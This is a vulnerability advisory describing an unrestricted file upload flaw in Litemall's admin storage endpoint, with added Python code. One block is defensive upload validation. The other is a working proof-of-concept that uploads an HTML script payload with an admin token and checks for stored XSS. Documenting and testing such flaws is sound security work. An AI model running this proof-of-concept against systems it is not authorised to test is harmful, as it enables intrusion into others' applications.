Linlinjava Litemall Unrestricted File Upload Vulnerability in Admin Storage Controller

Vulnerability

A vulnerability allowing unrestricted file uploads has been identified in Linlinjava Litemall versions through 1.8.0. It resides in the 'create' function of the AdminStorageController, which does not validate the type or content of the uploaded 'file' parameter. An attacker holding a valid admin token can therefore upload arbitrary file types. Depending on how and where the stored file is later served, this can lead to stored cross-site scripting (XSS) or to remote code execution (RCE). The vulnerability can be exploited remotely.
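The check that the 'create' handler lacks, shown as an added example in Python (Litemall itself is a Java/Spring project; this is not its code and makes no claim about its internals). The function models what a storage endpoint should do before persisting a user-supplied file: allowlist the extension, confirm the magic bytes match that extension, refuse image files that carry active markup after the header, store under a server-chosen name, and serve with a server-determined Content-Type plus nosniff. The allowlist, marker list and helper names are assumptions for illustration.

```python
"""Added illustration of the content validation missing from an upload handler.

Not Litemall code. Models what a storage 'create' handler should verify
before writing a client-supplied file to disk or object storage.
"""
import os
import secrets

# Assumed allowlist for an image-storage endpoint:
# lowercase extension -> magic-byte prefixes that must open the file.
ALLOWED_TYPES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

# Content-Type the server will send back; never taken from the client.
CONTENT_TYPES = {
    ".png": "image/png",
    ".jpg": "image/jpeg",
    ".jpeg": "image/jpeg",
    ".gif": "image/gif",
}

# Markup that turns a response into an active document if served inline.
# Kept to tokens of 5+ bytes so they do not appear by chance in image data.
ACTIVE_MARKERS = (b"<script", b"<html", b"<iframe", b"<?php")


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason). Accept only files provably of an allowed image type."""
    if not data:
        return False, "empty file"
    base = os.path.basename(filename)          # strip any path component
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, f"extension {ext or '(none)'} not in allowlist"
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, f"content does not match {ext} magic bytes"
    head = data[:4096].lower()
    if any(marker in head for marker in ACTIVE_MARKERS):
        # Polyglot: valid image header followed by script/markup.
        return False, "active content found after image header"
    return True, "ok"


def stored_name(ext: str) -> str:
    """Server-chosen storage name; the client's filename is never reused."""
    return secrets.token_hex(16) + ext


def serve_headers(ext: str) -> dict:
    """Headers for returning a validated file: fixed type, no sniffing."""
    return {
        "Content-Type": CONTENT_TYPES[ext],
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32          # constructed sample
    for name, blob in [("logo.png", png),
                       ("xss.html", b"<script>alert(1)</script>"),
                       ("fake.png", b"<script>alert(1)</script>"),
                       ("poly.png", png + b"<script>alert(1)</script>")]:
        print(name, validate_upload(name, blob))
```

The magic-byte and extension checks are what stop an HTML or JSP file from being stored at all; the server-chosen name and the fixed Content-Type with nosniff are what stop a file that does get stored from being interpreted as anything other than the image type it was validated as.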

Impact

Exploitation of this vulnerability allows an authenticated admin user, or an attacker holding a stolen admin token, to store arbitrary files on the server. The practical impact depends on how the stored file is served back: stored cross-site scripting (XSS) when it is returned inline from the application's origin as HTML, SVG or another type the browser renders as a document, and remote code execution (RCE) when the storage location is one from which the server will execute the file. The reproduction below demonstrates the stored XSS case.

Reproduction

To reproduce this vulnerability, send a multipart/form-data POST request to the '/admin/storage/create' endpoint whose 'file' part carries malicious content, for example an HTML file containing a script tag. The request must include a valid 'X-Litemall-Admin-Token' header for authentication. Requesting the stored file afterwards and confirming that it is served inline from the application's origin, so that the script executes, demonstrates the stored XSS aspect.
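The request described above, as an added proof-of-concept in Python (not from the advisory or the Litemall project). The endpoint path and the token header name are the ones the advisory states; BASE_URL, the token value, and the assumption that the JSON response carries the stored file's URL under 'data.url' are placeholders to adjust for a real target. The builder is separated from the network calls so the multipart encoding can be inspected offline, and the last function encodes the condition under which the upload actually becomes stored XSS: the file must come back with status 200, be rendered as a document (HTML/SVG/XHTML, or an absent Content-Type without nosniff), not be forced to download, and still contain the payload.

```python
"""Added proof-of-concept for the reproduction step (not advisory or project code).

Assumptions: BASE_URL points at a Litemall instance, TOKEN is a valid admin
token obtained by logging in, and the upload response is JSON whose
data.url field holds the public URL of the stored file.
"""
import json
import secrets
import urllib.request

BASE_URL = "http://localhost:8080"          # assumption: local test instance
TOKEN = "replace-with-a-valid-admin-token"  # assumption: admin session token
ENDPOINT = "/admin/storage/create"          # from the advisory

# Constructed payload: a document that runs script when rendered inline.
XSS_HTML = b"<!doctype html><script>alert(document.domain)</script>"


def build_multipart(field: str, filename: str, content: bytes,
                    content_type: str, boundary: str = "") -> tuple[bytes, str]:
    """Encode one file part as multipart/form-data. Returns (body, Content-Type value)."""
    boundary = boundary or "----poc" + secrets.token_hex(8)
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + content + tail, f"multipart/form-data; boundary={boundary}"


def build_upload_request(base_url: str, token: str, filename: str,
                         content: bytes, content_type: str) -> urllib.request.Request:
    """POST to the storage endpoint with the admin token header set."""
    body, ctype = build_multipart("file", filename, content, content_type)
    return urllib.request.Request(
        base_url + ENDPOINT, data=body, method="POST",
        headers={"Content-Type": ctype, "X-Litemall-Admin-Token": token},
    )


def stored_xss_confirmed(status: int, headers: dict, body: bytes, marker: bytes) -> bool:
    """True only if the stored file is served in a way a browser will render as a document."""
    h = {k.lower(): v.lower() for k, v in headers.items()}
    ctype = h.get("content-type", "")
    nosniff = h.get("x-content-type-options") == "nosniff"
    disposition = h.get("content-disposition", "")
    renders = ctype.startswith(("text/html", "image/svg+xml", "application/xhtml+xml")) \
        or (ctype == "" and not nosniff)       # missing type: browser may sniff HTML
    return status == 200 and renders and "attachment" not in disposition and marker in body


def run_poc() -> bool:
    """Upload the payload, then fetch it back and classify the response."""
    req = build_upload_request(BASE_URL, TOKEN, "xss.html", XSS_HTML, "text/html")
    with urllib.request.urlopen(req, timeout=10) as resp:
        result = json.loads(resp.read())
    url = result["data"]["url"]                 # assumption about the JSON layout
    with urllib.request.urlopen(url, timeout=10) as resp:
        served = resp.read()
        confirmed = stored_xss_confirmed(resp.status, dict(resp.getheaders()),
                                         served, b"<script>")
    print("stored file at", url, "- stored XSS confirmed:", confirmed)
    return confirmed


if __name__ == "__main__":
    run_poc()
```

Run it only against an instance you are authorised to test. If the second request comes back with an image Content-Type plus nosniff, or with a Content-Disposition of attachment, the upload is still unrestricted but the stored XSS path is closed, and the remaining question is whether the storage backend writes to a location the server executes.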

Added: Aug 14, 2025, 4:33 PM
Updated: Aug 14, 2025, 4:33 PM

Vulnerability Rating

Custom Algorithm

spread          2.2
impact          0.0
exploitability  6.3
remediation     0.0
relevance       0.3
threat          6.4
urgency         2.9
incentive       1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.